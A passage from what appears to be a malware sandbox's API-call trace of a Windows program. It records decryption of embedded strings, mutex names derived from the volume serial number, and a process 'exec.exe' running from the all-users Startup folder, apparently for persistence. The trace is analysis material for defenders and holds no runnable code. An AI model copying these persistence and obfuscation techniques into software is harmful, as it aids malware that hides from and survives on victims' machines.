dwFlags=0xf0000000 | out: phProv=0x98fcf0*=0x384eb8) returned 1 [0103.262] CryptImportKey (in: hProv=0x384eb8, pbData=0x34fad0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb38 | out: phKey=0x34fb38*=0x384e60) returned 1 [0103.262] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34fb20, dwFlags=0x0) returned 1 [0103.718] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f71470, pdwDataLen=0x34faec | out: pbData=0x1f71470, pdwDataLen=0x34faec) returned 1 [0103.719] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f71498 [0103.719] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x1e) returned 0x1f714c0 [0103.719] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x90) returned 0x1f714e8 [0103.719] CryptImportKey (in: hProv=0x384eb8, pbData=0x34faa8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb10 | out: phKey=0x34fb10*=0x384e60) returned 1 [0103.719] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34faf8, dwFlags=0x0) returned 1 [0103.719] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f714e8, pdwDataLen=0x34fac4 | out: pbData=0x1f714e8, pdwDataLen=0x34fac4) returned 1 [0103.719] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.719] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714e8 | out: hHeap=0x1f70000) returned 1 [0103.719] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1f71498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.719] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714c0 | out: hHeap=0x1f70000) returned 1 [0103.719] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71470 | out: hHeap=0x1f70000) returned 1 [0103.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x34fb78, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x34fb78*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.719] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71498 | out: hHeap=0x1f70000) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x40) returned 0x1f71470 [0103.719] CryptImportKey (in: hProv=0x384eb8, pbData=0x34fb04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb6c | out: phKey=0x34fb6c*=0x384e60) returned 1 [0103.720] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34fb54, dwFlags=0x0) returned 1 [0103.720] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f71470, pdwDataLen=0x34fb20 | out: pbData=0x1f71470, pdwDataLen=0x34fb20) returned 1 [0103.720] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x34) returned 0x1f714b8 [0103.720] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.720] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0103.720] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0103.720] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71470 | out: hHeap=0x1f70000) returned 1 [0103.720] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714b8 | out: hHeap=0x1f70000) returned 1 [0103.720] ReleaseMutex (hMutex=0x84) returned 1 [0103.720] CloseHandle (hObject=0x84) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x20) returned 0x1f71470 [0103.720] CryptImportKey (in: hProv=0x384eb8, pbData=0x34fae4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb4c | out: phKey=0x34fb4c*=0x384e60) returned 1 [0103.720] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34fb34, dwFlags=0x0) returned 1 [0103.720] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f71470, pdwDataLen=0x34fb00 | out: pbData=0x1f71470, pdwDataLen=0x34fb00) returned 1 [0103.720] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x1e) returned 0x1f71498 [0103.720] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x1e) returned 0x1f714c0 [0103.720] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x90) returned 0x1f714e8 [0103.720] CryptImportKey (in: hProv=0x384eb8, pbData=0x34fabc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb24 | out: phKey=0x34fb24*=0x384e60) returned 1 [0103.720] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34fb0c, dwFlags=0x0) returned 1 [0103.720] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f714e8, pdwDataLen=0x34fad8 | out: pbData=0x1f714e8, pdwDataLen=0x34fad8) returned 1 [0103.720] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.720] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714e8 | out: hHeap=0x1f70000) returned 1 [0103.720] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1f71498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.720] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714c0 | out: hHeap=0x1f70000) returned 1 [0103.720] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71470 | out: hHeap=0x1f70000) returned 1 [0103.721] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x34fb8c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x34fb8c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71498 | out: hHeap=0x1f70000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x0, Size=0x40) returned 0x1f71470 [0103.721] CryptImportKey (in: hProv=0x384eb8, pbData=0x34fb18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x34fb80 | out: phKey=0x34fb80*=0x384e60) returned 1 [0103.721] CryptSetKeyParam (hKey=0x384e60, dwParam=0x1, pbData=0x34fb68, dwFlags=0x0) returned 1 [0103.721] CryptDecrypt (in: hKey=0x384e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1f71470, pdwDataLen=0x34fb34 | out: pbData=0x1f71470, pdwDataLen=0x34fb34) returned 1 [0103.721] CryptDestroyKey (hKey=0x384e60) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x1f70000, Flags=0x8, Size=0x34) returned 0x1f714b8 [0103.721] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x84 [0103.721] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x102 [0103.721] CloseHandle (hObject=0x84) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71470 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f714b8 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71420 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71448 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f712b8 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f721f8 | out: hHeap=0x1f70000) returned 1 [0103.721] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f71280 | out: hHeap=0x1f70000) returned 1 [0103.722] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0103.722] ExitProcess (uExitCode=0x0) [0103.722] HeapFree (in: hHeap=0x1f70000, dwFlags=0x0, lpMem=0x1f707d0 | out: hHeap=0x1f70000) returned 1 Process: id = "16" image_name = "exec.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" page_root = "0x15c79000" os_pid = "0x5e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x568" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 107 os_tid = 0x604 [0123.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33f9b4 | out: lpSystemTimeAsFileTime=0x33f9b4*(dwLowDateTime=0x50e64130, dwHighDateTime=0x1d4f12b)) [0123.961] GetCurrentProcessId () returned 0x5e8 [0123.961] GetCurrentThreadId () returned 0x604 [0123.961] GetTickCount () returned 0xaaa0 [0123.961] QueryPerformanceCounter (in: lpPerformanceCount=0x33f9ac | out: lpPerformanceCount=0x33f9ac*=8828656042) returned 1 [0123.961] GetStartupInfoW (in: lpStartupInfo=0x33f958 | out: lpStartupInfo=0x33f958*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x33f9bc, hStdError=0x838be4)) [0123.961] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.961] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x20f0000 [0123.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0123.963] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0123.963] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0123.963] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0123.963] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0123.964] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x214) returned 0x20f07d0 [0123.964] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0123.964] GetCurrentThreadId () returned 0x604 [0123.964] GetStartupInfoW (in: lpStartupInfo=0x33f8f4 | out: lpStartupInfo=0x33f8f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8371aa, hStdOutput=0x8374e3, hStdError=0x20f07d0)) [0123.964] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x800) returned 0x20f09f0 [0123.964] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0123.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0123.964] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.964] SetHandleCount (uNumber=0x20) returned 0x20 [0123.964] GetCommandLineA () returned="\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe\" " [0123.964] GetEnvironmentStringsW () returned 0xa247c0* [0123.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0123.965] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x565) returned 0x20f11f8 [0123.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x20f11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0123.965] FreeEnvironmentStringsW (penv=0xa247c0) returned 1 [0123.965] GetLastError () returned 0x5 [0123.965] SetLastError (dwErrCode=0x5) [0123.965] GetLastError () returned 0x5 [0123.965] SetLastError (dwErrCode=0x5) [0123.965] GetLastError () returned 0x5 [0123.965] SetLastError (dwErrCode=0x5) [0123.965] GetACP () returned 0x4e4 [0123.965] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x220) returned 0x20f1768 [0123.965] GetLastError () returned 0x5 [0123.966] SetLastError (dwErrCode=0x5) [0123.966] IsValidCodePage (CodePage=0x4e4) returned 1 [0123.966] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f8bc | out: lpCPInfo=0x33f8bc) returned 1 [0123.966] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f388 | out: lpCPInfo=0x33f388) returned 1 [0123.966] GetLastError () returned 0x5 [0123.966] SetLastError (dwErrCode=0x5) [0123.966] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0123.966] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x33f108, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧\x83Ā") returned 256 [0123.966] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧\x83Ā", cchSrc=256, lpCharType=0x33f39c | out: lpCharType=0x33f39c) returned 1 [0123.966] GetLastError () returned 0x5 [0123.966] SetLastError (dwErrCode=0x5) [0123.966] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0123.966] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x33f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0123.966] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0123.966] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x33eec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0123.966] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x33f69c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdf\x81\x28\x5e\xd4\xf8\x33", lpUsedDefaultChar=0x0) returned 256 [0123.967] GetLastError () returned 0x5 [0123.967] SetLastError (dwErrCode=0x5) [0123.967] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0123.967] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f79c, cbMultiByte=256, lpWideCharStr=0x33f0f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0123.967] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0123.967] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x33eee8, cchDest=256 | out: lpDestStr=" 